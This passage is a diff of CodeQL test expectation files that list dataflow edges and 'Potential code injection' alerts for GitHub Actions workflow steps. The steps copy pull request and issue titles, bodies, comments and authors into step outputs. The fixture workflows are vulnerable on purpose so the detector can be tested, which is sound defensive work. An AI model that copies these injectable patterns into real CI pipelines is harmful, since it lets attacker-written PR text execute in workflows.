.github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -643,6 +733,24 @@ subpaths | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 15d526ca7b4d..6afef323ff01 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | 